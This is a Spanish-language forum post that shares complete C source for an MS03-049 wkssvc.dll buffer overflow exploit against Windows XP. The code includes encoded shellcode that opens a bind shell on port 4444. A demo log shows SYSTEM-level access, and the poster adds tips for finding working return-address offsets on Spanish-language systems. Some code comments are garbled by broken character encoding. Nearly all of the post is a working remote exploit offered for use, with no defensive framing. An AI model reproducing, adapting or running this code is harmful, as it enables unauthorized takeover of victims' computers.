0349 II (devuelve shell tb)

Exploit @ http://www.security.nnov.ru/files/ntctl-03-49.c

Devuelve una shell en el puerto 4444

Creo q esta basado en el exploit 03-049 de Wirepair, la mayor parte del codigo coincide solo q esta modificacion de Firestorm añade más lineas....

Código:

#define ADDR 0x75133776
//`call edi' instruction ;    tested winxpSP0ru,winxpSP1ru.
// ms03-049 wkksvc.dll buffer overflow exploit (winxp) modified by Firestorm
// + ¯®¤¤¥à¦ª àãááª®£® ï§ëª ¢ è¥««¥
#include <winsock2.h>
#include <windows.h>
#include <lm.h>
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <io.h>
#pragma comment(lib,"ws2_32.lib")

/* DEMO

D:\CBuilder6\PROJECTS\0349>ntctl-03-49.exe 127.1.1.1
Attacking: 127.1.1.1
net use \\127.1.1.1\ipc$ "" /user:""
Š®¬ ¤ ¢ë¯®«¥ ãá¯¥è®.

Waiting 1s...
Connecting 127.1.1.1:4444...Connected to 127.1.1.1:4444!

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

D:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM

D:\WINDOWS\system32>exit
exit
-> Connection closed...
*/
typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);

   char overwrite[2045] = "";
   char sc[] =
   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //like nop
   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x90"
//'call edi' here

"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

   char netuse[100];
   char exp_buf[2045+4+16+(sizeof sc)];
   char ip[30];
   LPWSTR ipl[60];
   DWORD calledi = ADDR;
   LPWSTR unicodesp0[(2045+4+16+(sizeof sc))*2];
   char unicode[(2045+4+16+(sizeof sc))*2];
   int i = 0;
   int x = 0;
   int len = 0;
   HINSTANCE hinstLib;
MYPROC ProcAddr;
char *host;
   int SP;
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
// asm int 3;
   _snprintf(ip, 24, "\\\\%s", host);

   hinstLib = LoadLibrary("netapi32.dll");

   memset(overwrite, 0x41, 2000);
   memset(overwrite+2000, 0x90, 44);
   memcpy(exp_buf, overwrite, 2044);
   memcpy(exp_buf+2044, &calledi, 4);
   memset(exp_buf+2048, 0x90, 16);
   memcpy(exp_buf+2064, sc, sizeof(sc));

   memset(unicode, 0x00, sizeof(unicode));
   for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) unicode[i] = exp_buf[x];
   MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));

   MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);

   if (hinstLib != NULL)
   {
      ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
      if (NULL != ProcAddr)
      {
//         printf("\nGetProcAddr: %x\n", *ProcAddr);
         (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
         (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);
// § ¬¥ç¥®, çâ® ¯à¨ ¥ã£ ¤ë¢ ¨¨ á¥à¢¨á¯ ª ¨ç¥£® ¥®¡ëç®£® ¥ ¯à®¨áå®¤¨â, ¯®íâ®¬ã
// íªá¯«®©â¨¬ ®¤®¢à¥¬¥® ª ª sp0 ¨ sp1
      }
      else printf("procaddr null\n");
   FreeLibrary(hinstLib);
   } else printf("hinst null\n");
ExitThread(0);
}

void err_exit(char *s) {
   printf("%s\n",s);
   exit(0);
}
void shell(int sock) {
   int l;
   char buf[512];
   struct timeval time;
   unsigned long ul[2];

   time.tv_sec=1;
   time.tv_usec=0;

   while (1) {
      ul[0]=1;
      ul[1]=sock;

      l=select(0,(fd_set *)&ul,NULL,NULL,&time);
      if(l==1) {
         l=recv(sock,buf,sizeof(buf),0);
         if (l<=0) {
            err_exit("-> Connection closed...\n");
         }
         l=write(1,buf,l);
         if (l<=0) {
            err_exit("-> Connection closed...\n");
         }
      }
      else {
         l=read(0,buf,sizeof(buf));
         if (l<=0) {
            err_exit("-> Connection closed...\n");
         }
         l=send(sock,buf,l,0);
         if (l<=0) {
            err_exit("-> Connection closed...\n");
         }
      }
   }
}

int main(int argc, char **argv) {
DWORD dwThreadId, dwThrdParam = 1;
WSADATA tmp;
struct hostent *he;
struct sockaddr_in their_addr;
int sockfd;
   if (argc < 2) {
      fprintf(stderr, "ms03-049 winxp wkksvc.dll buffer overflow exploit.\n");
      fprintf(stderr, "Usage: %s <ip>\n",argv[0]);
      exit(1);
   }
//   SP=atoi(argv[2]); //unused
   host=argv[1];
   printf("Attacking: %s\n",host);

   sprintf(&netuse,"net use \\\\%s\\ipc$ \"\" /user:\"\"",host);
   printf("%s\n",netuse);
   system(netuse);

   CreateThread(NULL,0,ThreadFunc,&dwThrdParam,0,&dwThreadId);
printf("Waiting 1s...");Sleep(1000);
printf("\nConnecting %s:%d...",host,4444);

WSAStartup (MAKEWORD(2,0),&tmp);
he = gethostbyname(host);

their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(4444);
sockfd=socket(AF_INET,SOCK_STREAM,0);

if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("Couldnt connect to bindshell.\n");
return(0);
}
printf("Connected to %s:%d!\n\n",host,4444);Sleep(100);
shell(sockfd);
return(0);
}

Funciona en WIN XP sp0 perfectamente....

Pa sacar el offset en WinXP sp0, buscáis el call edi como indican los comentarios del codigo. Si lo hacéis con el findjmp, de toda la lista, encontraréis uno q varia en una cifra respecto al offset ruso del codigo, ese funciona. Por cierto, me estoy dando cuenta d q la mayoria de los offsets españoles varian solo en una cifra respecto a los rusos, eso ayuda a encontrarlos, supongo

Tambien vale q probéis con el offset sacado del jmp esp sobre wkssvc.dll, o al menos a mi me ha funcionao...

Nota: Al salir, el sistema remoto no se cuelga a menos q la victima ejecute cmd.exe. Entonces es cuando se cuelga... ::)